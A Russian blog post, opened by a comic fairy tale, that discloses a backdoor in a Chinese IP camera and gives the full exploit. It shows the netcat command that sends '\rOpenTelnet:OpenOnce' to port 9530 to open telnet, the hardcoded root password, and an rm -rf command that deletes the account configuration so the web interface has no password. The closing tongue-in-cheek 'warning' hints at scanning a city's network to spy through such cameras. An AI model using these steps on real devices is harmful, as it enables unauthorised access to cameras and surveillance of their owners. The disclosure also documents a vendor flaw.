Сказка-присказка

Купил один барин дверь надежную, чугуниевую с замками на дохулиард комбинаций, но после установки скрипеть петли стали. Вызвали он специалиста сидит у себя на кухне ждет, чаи попивает, вдруг заходит к нему монтажник и говорит человеческим голосом «Ищу работу Петли смазал, иди проверяй». А барин его и вопрошает «Как вошел ты сквозь дверь чугуниевую, всю из себя сертифицированную направо и налево». Отвечает на это работник физического труда «Для того чтобы под порогом не ждать когда ты барин открыть нам изволишь, мы рукожопами сертифицированными специалистами решили кнопку сделать тайную, так что стукнешь в верхний левый угол двери, дверь то и откроется».

Брехня, подумаете Вы, так только в сказках бывает и будете в корне не правы

В данном посте убедительно и с примерами убедительно докажу, что такие разработчики существуют.

Попала мне как-то в руки IP камера из страны славящейся своим неповторимым качеством производимой техники, с паролем неизвестным, гугление по сбросу настроек привело меня к утилитке, которая сбрасывала этот пароль, а вот способ которым она это делает меня и заинтересовал.

Вот что было открыто на камере изначально.
Host is up (0.0014s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
80/tcp open http
554/tcp open rtsp
8899/tcp open ospf-lite
9527/tcp open unknown
9530/tcp open unknown
34567/tcp open unknown

WEB запаролен. CLI нет.

Запускаем tcpdump, запускаем утилиту сброса пароля.
Видим, что посылается команда \rOpenTelnet:OpenOnce на порт 9530 tcp. После чего на устройстве открывается telnet и программа идет на порт 23 и с помощью заранее предустановленных паролей сбрасывает конфигурацию в части касающейся паролей.



Попробуем все сделать вручную
1. Открываем telnet на камере
nc 192.168.1.10 9530
\rOpenTelnet:OpenOnce

проверяем, что он открыт
nmap -p 1-65535 192.168.1.10

PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
554/tcp open rtsp
8899/tcp open ospf-lite
9527/tcp open unknown
9530/tcp open unknown
34567/tcp open unknown

Заходим под стандартным паролем
telnet 192.168.1.10
Trying 192.168.1.10…
Connected to 192.168.1.10.
Escape character is '^]'.
LocalHost login: root
Password: xmhdipc
Welcome to Monitor Tech.
# rm -rf /mnt/mtd/Config/Account*
# reboot
# Connection closed by foreign host.

После перезагрузки камера доступна через web без пароля. Наслаждайтесь.

Чем руководствуется производитель оборудования когда оставляет такие дыры мне лично не понятно.

Дорогие читатели, никогда не сканируйте сеть города за которым вы бы хотели понаблюдать, на предмет открытого порта 9530, и не производите действий описанный выше, это может привести к желанию уйти в отпуск или отправиться в путешествие.